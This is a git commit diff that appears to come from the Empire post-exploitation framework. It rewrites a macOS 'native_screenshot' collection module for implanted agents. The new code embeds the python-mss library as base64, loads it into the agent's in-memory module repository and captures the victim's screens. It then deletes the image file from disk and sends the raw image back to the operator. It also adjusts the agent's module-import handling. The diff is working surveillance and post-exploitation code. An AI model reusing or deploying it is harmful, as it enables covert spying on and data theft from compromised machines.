Swapped native_screenshot module. Now uses python-mss and drops image to disk

readme-wiki
xorrior 2017-11-29 14:08:12 -05:00
parent a2b3d09580
commit 3558acba42
4 changed files with 50 additions and 23 deletions

View File

@ -449,6 +449,9 @@ def process_packet(packetType, data, resultID):
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in moduleRepo.keys():
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))

Binary file not shown.

View File

@ -2695,7 +2695,7 @@ class PythonAgentMenu(SubMenu):
self.mainMenu.modules.search_modules(searchTerm)
def do_sc(self, line):
"Use pyobjc and Foundation libraries to take a screenshot, and save the image to the server"
"Use the python-mss module to take a screenshot, and save the image to the server. Not opsec safe"
if self.mainMenu.modules.modules['python/collection/osx/native_screenshot']:
module = self.mainMenu.modules.modules['python/collection/osx/native_screenshot']

View File

@ -1,3 +1,9 @@
from zlib_wrapper import compress
import os
from lib.common import helpers
import hashlib
import base64
class Module:
def __init__(self, mainMenu, params=[]):
@ -23,7 +29,7 @@ class Module:
'NeedsAdmin': False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': True,
'OpsecSafe': False,
# the module language
'Language' : 'python',
@ -44,6 +50,18 @@ class Module:
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'SavePath': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Monitor to obtain a screenshot. 0 represents all.',
'Required' : True,
'Value' : '/tmp/debug.png'
},
'Monitor': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Monitor to obtain a screenshot. -1 represents all.',
'Required' : True,
'Value' : '-1'
}
}
@ -64,25 +82,31 @@ class Module:
def generate(self, obfuscate=False, obfuscationCommand=""):
path = self.mainMenu.installPath + "data/misc/python_modules/mss.zip"
filename = os.path.basename(path).rstrip('.zip')
open_file = open(path, 'rb')
module_data = open_file.read()
open_file.close()
module_data = base64.b64encode(module_data)
script = """
try:
import Quartz
import Quartz.CoreGraphics as CG
from AppKit import *
import binascii
except ImportError:
print "Missing required module..."
import os
import base64
data = "%s"
def run(data):
rawmodule = base64.b64decode(data)
zf = zipfile.ZipFile(io.BytesIO(rawmodule), "r")
if "mss" not in moduleRepo.keys():
moduleRepo["mss"] = zf
install_hook("mss")
onScreenWindows = CG.CGWindowListCreate(CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID)
desktopElements = Foundation.CFArrayCreateMutableCopy(None, 0, onScreenWindows)
imageRef = CG.CGWindowListCreateImageFromArray(CG.CGRectInfinite, desktopElements, CG.kCGWindowListOptionAll)
rep = NSBitmapImageRep.alloc().initWithCGImage_(imageRef)
props = NSDictionary()
imageData = rep.representationUsingType_properties_(NSPNGFileType,props)
imageString = str(imageData).strip('<').strip('>>').strip('native-selector bytes of')
hexstring = binascii.hexlify(imageString)
hex_data = hexstring.decode('hex')
print hex_data
"""
from mss import mss
m = mss()
file = m.shot(mon=%s,output='%s')
raw = open(file, 'rb').read()
run_command('rm -f %%s' %% (file))
print raw
run(data)
""" % (module_data, self.options['Monitor']['Value'], self.options['SavePath']['Value'])
return script